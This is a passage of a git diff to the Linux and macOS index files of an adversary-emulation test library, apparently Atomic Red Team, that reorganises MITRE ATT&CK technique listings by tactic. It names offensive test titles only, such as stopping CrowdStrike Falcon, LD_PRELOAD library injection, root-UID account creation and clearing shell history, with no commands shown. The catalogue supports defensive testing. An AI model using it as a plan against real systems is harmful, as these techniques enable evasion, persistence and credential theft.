TEST](https://atomicredteam.io/contributing) +- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) + # defense-evasion - T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1550.001 Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1027.001 Binary Padding](../../T1027.001/T1027.001.md) - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux] - T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1612 Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1070.003 Clear Command History](../../T1070.003/T1070.003.md) - Atomic Test #1: Clear Bash history (rm) [linux, macos] - Atomic Test #2: Clear Bash history (echo) [linux] @@ -226,6 +171,7 @@ - T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1140 Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1610 Deploy Container [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1562.008 Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
@@ -237,7 +183,12 @@ - Atomic Test #3: Disable SELinux [linux] - Atomic Test #4: Stop Crowdstrike Falcon on Linux [linux] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1601.002 Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) + - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] + - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] - T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -264,9 +215,6 @@ - [T1553.004 Install Root Certificate](../../T1553.004/T1553.004.md) - Atomic Test #1: Install root CA on CentOS/RHEL [linux] - Atomic Test #2: Install root CA on Debian/Ubuntu [linux] -- [T1574.006 LD_PRELOAD](../../T1574.006/T1574.006.md) - - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] - - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] - [T1222.002 Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) - Atomic Test #1: chmod - Change file or folder mode (numeric mode) [macos, linux] - Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [macos, linux] 
@@ -389,12 +337,14 @@ - T1580 Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1613 Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1087.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1069.002 Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1087.003 Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1083 File and Directory Discovery](../../T1083/T1083.md) - Atomic Test #3: Nix File and Diectory Discovery [macos, linux] - Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux] +- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1087.001 Local Account](../../T1087.001/T1087.001.md) - Atomic Test #1: Enumerate all accounts (Local) [linux] - Atomic Test #2: View sudoers access [linux, macos] @@ -433,6 +383,7 @@ - Atomic Test #5: Linux VM Check via Kernel Modules [linux] - Atomic Test #7: Hostname Discovery [linux, macos] - Atomic Test #11: Environment variables discovery on macos and linux [macos, linux] +- T1614 System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1016 System Network Configuration Discovery](../../T1016/T1016.md) - Atomic Test #3: System Network Configuration Discovery [macos, linux] - [T1049 System Network Connections Discovery](../../T1049/T1049.md) 
@@ -443,6 +394,84 @@ - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +# persistence +- T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) + - Atomic Test #1: At - Schedule a job [linux] +- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1176 Browser Extensions](../../T1176/T1176.md) + - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos] + - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos] + - Atomic Test #3: Firefox [linux, windows, macos] +- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) + - Atomic Test #1: ListCronjobs [linux, macos] + - Atomic Test #2: CreateCronjob [linux, macos] +- T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.003 Cron](../../T1053.003/T1053.003.md) + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, 
linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] +- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) + - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] + - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] +- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1525 Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md) + - Atomic Test #1: Linux - Load Kernel Module via insmod [linux] +- [T1136.001 Local Account](../../T1136.001/T1136.001.md) + - Atomic Test #1: Create a user account on a Linux system [linux] + - Atomic Test #5: Create a new user in Linux with `root` UID and GID. 
[linux] +- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1137 Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1137.002 Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1137.004 Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1037.004 RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md) + - Atomic Test #1: Modify SSH Authorized Keys [macos, linux] +- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) + - Atomic Test #1: Create Systemd Service [linux] +- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) + - Atomic Test #1: Create Systemd Service and Timer [linux] +- T1542.005 
TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1505.002 Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.005 Trap](../../T1546.005/T1546.005.md) + - Atomic Test #1: Trap [macos, linux] +- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) + - Atomic Test #1: Add command to .bash_profile [macos, linux] + - Atomic Test #2: Add command to .bashrc [macos, linux] +- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1505.003 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) + # resource-development - T1583 Acquire Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1583.005 Botnet [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
@@ -458,11 +487,14 @@ - T1588.004 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1583.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1584.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608.004 Drive-by Target [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1585.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1586.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1585 Establish Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1587.004 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1588.005 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608.003 Install Digital Certificate [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608.005 Link Target [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1587.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1588.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1588 Obtain Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
@@ -470,7 +502,10 @@ - T1584.004 Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1585.001 Social Media Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1586.001 Social Media Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608 Stage Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1588.002 Tool [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608.001 Upload Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608.002 Upload Tool [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1583.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1584.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1588.006 Vulnerabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
@@ -590,14 +625,21 @@ - [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) - Atomic Test #1: At - Schedule a job [linux] - T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1609 Container Administration Command](../../T1609/T1609.md) + - Atomic Test #1: ExecIntoContainer [linux, macos] +- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) + - Atomic Test #1: ListCronjobs [linux, macos] + - Atomic Test #2: CreateCronjob [linux, macos] - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] +- T1610 Deploy Container [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1059.007 JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1204.002 Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1204.003 Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1106 Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1059.008 Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index ebfb40df..baee6de3 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md 
@@ -1,118 +1,4 @@ # macOS Atomic Tests by ATT&CK Tactic & Technique -# privilege-escalation -- [T1546.004 .bash_profile and .bashrc](../../T1546.004/T1546.004.md) - - Atomic Test #1: Add command to .bash_profile [macos, linux] - - Atomic Test #2: Add command to .bashrc [macos, linux] -- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1053.003 Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] -- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.014 Emond](../../T1546.014/T1546.014.md) - - Atomic Test #1: Persistance with Event Monitor - emond [macos] -- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1547.006 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md) - - Atomic Test #1: Launch Agent [macos] -- [T1543.004 Launch 
Daemon](../../T1543.004/T1543.004.md) - - Atomic Test #1: Launch Daemon [macos] -- [T1053.004 Launchd](../../T1053.004/T1053.004.md) - - Atomic Test #1: Event Monitor Daemon Persistence [macos] -- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md) - - Atomic Test #1: Logon Scripts - Mac [macos] -- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md) - - Atomic Test #1: Plist Modification [macos] -- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1037.004 Rc.common](../../T1037.004/T1037.004.md) - - Atomic Test #1: rc.common [macos] -- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md) - - Atomic Test #1: Re-Opened Applications [macos] - - Atomic Test #2: Re-Opened Applications [macos] -- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md) - - Atomic Test #1: Make and modify binary from C source [macos, linux] - - Atomic Test #2: Set a SetUID flag on file [macos, linux] - - Atomic Test #3: Set a SetGID flag on file [macos, linux] -- [T1037.005 Startup Items](../../T1037.005/T1037.005.md) - - Atomic Test #1: Add file to Local Library StartupItems [macos] -- [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md) - - Atomic Test #1: Sudo usage [macos, linux] - - Atomic Test #2: Unlimited sudo cache timeout [macos, linux] - - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux] -- [T1546.005 Trap](../../T1546.005/T1546.005.md) - - Atomic Test #1: Trap [macos, linux] -- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - -# persistence -- [T1546.004 .bash_profile and .bashrc](../../T1546.004/T1546.004.md) - - Atomic Test #1: Add command to .bash_profile [macos, linux] - - Atomic Test #2: Add command to .bashrc [macos, linux] -- T1098 Account Manipulation [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) -- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1176 Browser Extensions](../../T1176/T1176.md) - - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos] - - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos] - - Atomic Test #3: Firefox [linux, windows, macos] - - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos] -- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1053.003 Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] -- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.014 Emond](../../T1546.014/T1546.014.md) - - Atomic Test #1: Persistance with Event Monitor - emond [macos] -- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1547.006 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md) - - Atomic Test #1: Launch Agent [macos] -- 
[T1543.004 Launch Daemon](../../T1543.004/T1543.004.md) - - Atomic Test #1: Launch Daemon [macos] -- [T1053.004 Launchd](../../T1053.004/T1053.004.md) - - Atomic Test #1: Event Monitor Daemon Persistence [macos] -- [T1136.001 Local Account](../../T1136.001/T1136.001.md) - - Atomic Test #2: Create a user account on a MacOS system [macos] -- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md) - - Atomic Test #1: Logon Scripts - Mac [macos] -- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md) - - Atomic Test #1: Plist Modification [macos] -- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1037.004 Rc.common](../../T1037.004/T1037.004.md) - - Atomic Test #1: rc.common [macos] -- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md) - - Atomic Test #1: Re-Opened Applications [macos] - - Atomic Test #2: Re-Opened Applications [macos] -- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md) - - Atomic Test #1: Modify SSH Authorized Keys [macos, linux] -- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1037.005 Startup Items](../../T1037.005/T1037.005.md) - - Atomic Test #1: Add file to Local Library StartupItems [macos] -- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.005 Trap](../../T1546.005/T1546.005.md) - - Atomic Test #1: Trap [macos, linux] -- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1505.003 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - # credential-access - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1552.003 Bash 
History](../../T1552.003/T1552.003.md) @@ -126,6 +12,7 @@ - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md) - Atomic Test #2: Search macOS Safari Cookies [macos] - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md) - Atomic Test #1: AppleScript - Prompt User for Password [macos] - T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -139,6 +26,7 @@ - T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1110.002 Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1110.001 Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1110.003 Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1552.004 Private Keys](../../T1552.004/T1552.004.md) @@ -148,6 +36,7 @@ - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) # collection 
@@ -183,6 +72,61 @@ - T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +# privilege-escalation +- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.003 Cron](../../T1053.003/T1053.003.md) + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] +- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.006 Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.014 Emond](../../T1546.014/T1546.014.md) + - Atomic Test #1: Persistance with Event Monitor - emond [macos] +- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547.006 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md) + - Atomic Test #1: Launch Agent [macos] 
+- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md) + - Atomic Test #1: Launch Daemon [macos] +- [T1053.004 Launchd](../../T1053.004/T1053.004.md) + - Atomic Test #1: Event Monitor Daemon Persistence [macos] +- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md) + - Atomic Test #1: Logon Scripts - Mac [macos] +- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md) + - Atomic Test #1: Plist Modification [macos] +- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md) + - Atomic Test #1: rc.common [macos] +- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md) + - Atomic Test #1: Re-Opened Applications [macos] + - Atomic Test #2: Re-Opened Applications [macos] +- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md) + - Atomic Test #1: Make and modify binary from C source [macos, linux] + - Atomic Test #2: Set a SetUID flag on file [macos, linux] + - Atomic Test #3: Set a SetGID flag on file [macos, linux] +- [T1037.005 Startup Items](../../T1037.005/T1037.005.md) + - Atomic Test #1: Add file to Local Library StartupItems [macos] +- [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md) + - Atomic Test #1: Sudo usage [macos, linux] + - Atomic Test #2: Unlimited sudo cache timeout [macos, linux] + - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux] +- [T1546.005 Trap](../../T1546.005/T1546.005.md) + - Atomic Test #1: Trap [macos, linux] +- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) + - Atomic Test #1: Add command to .bash_profile [macos, linux] + - Atomic Test #2: Add command to .bashrc [macos, linux] +- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) + # defense-evasion - T1548 
Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1027.001 Binary Padding](../../T1027.001/T1027.001.md) @@ -197,6 +141,7 @@ - [T1070.002 Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) - Atomic Test #1: rm -rf [macos, linux] - T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1027.004 Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1140 Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -209,6 +154,7 @@ - Atomic Test #9: Stop and unload Crowdstrike Falcon on macOS [macos] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.006 Dynamic Linker Hijacking [CONTRIBUTE A 